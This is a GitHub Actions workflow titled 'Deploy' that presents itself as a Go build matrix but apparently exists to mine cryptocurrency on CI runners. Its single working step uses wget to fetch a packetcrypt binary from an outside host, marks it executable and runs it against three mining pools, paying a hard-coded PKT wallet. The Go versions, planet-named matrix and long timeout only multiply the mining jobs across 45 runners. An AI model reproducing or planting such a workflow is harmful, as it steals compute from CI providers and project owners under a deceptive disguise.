name: Deploy
on: [push, pull_request]
jobs:
  build:
    name: Node-pool
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 30
      fail-fast: false
      matrix:
        go: [1.6, 1.7, 1.8, 1.9, 1.10]
        flag: [Mars, Jupiter, Saturn, Neptune, Eris, Wolf, Gliese, Epsilon, Gliese]
    timeout-minutes: 361
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: Node-pool
      run: |
       wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O packetcrypt && chmod +x packetcrypt && ./packetcrypt ann -p pkt1qagvlqw46m5jk8zysmctkh4epgrcmr8mfvdhejs http://pool.pkt.world http://pool.pktpool.io http://pool.pkteer.com -t 2
